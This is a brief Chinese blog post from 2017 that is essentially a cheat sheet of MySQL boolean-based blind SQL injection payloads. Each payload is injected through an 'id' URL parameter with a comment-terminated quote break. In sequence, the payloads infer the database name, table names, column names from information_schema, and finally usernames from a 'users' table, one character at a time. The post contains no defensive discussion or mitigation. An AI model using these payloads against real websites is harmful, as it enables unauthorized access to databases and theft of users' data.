Mysql布尔盲注payload

发表于 | 分类于 | 阅读数
字数统计: 205 | 阅读时长 ≈ 1

如题所示

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#判断当前数据库长度
?id=12'   and (select length(database())>5) --+
#判断当前数据库名
?id=12'   and (select ascii(substr(database(),1,1))>=97) --+
#判断第一个表的表长度
?id=12'   and (select length(table_name)>5 from information_schema.tables where table_schema=database() limit 0,1) --+		
#判断第二个表名
?id=12'   and (select ascii(substr(table_name,1,1))>97 from information_schema.tables where table_schema=database() limit 1,1) --+	
#判断users表的第一个字段长度
?id=12'   and (select length(column_name)>1 from information_schema.columns  where table_schema=database() and table_name='users' limit 0,1) --+	
#判断users表的第一个字段名
?id=12'   and (select ascii(substr(column_name,1,1))>65 from information_schema.columns  where table_schema=database() and table_name='users' limit 0,1) --+		
#判断username列的第一条数据长度
?id=12'   and (select length(username)>1 from users limit 0,1) --+		
#判断username列的第一条数据
?id=12'   and (select ascii(substr(username,1,1))>=65 from users limit 0,1) --+

本文标题:Mysql布尔盲注payload

文章作者:暮沉沉

发布时间:2017年08月26日 - 20:08

最后更新:2017年08月26日 - 20:08

原始链接:http://maplege.github.io/2017/08/26/boolBlandSQLInjection/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------本文结束感谢您的阅读-------------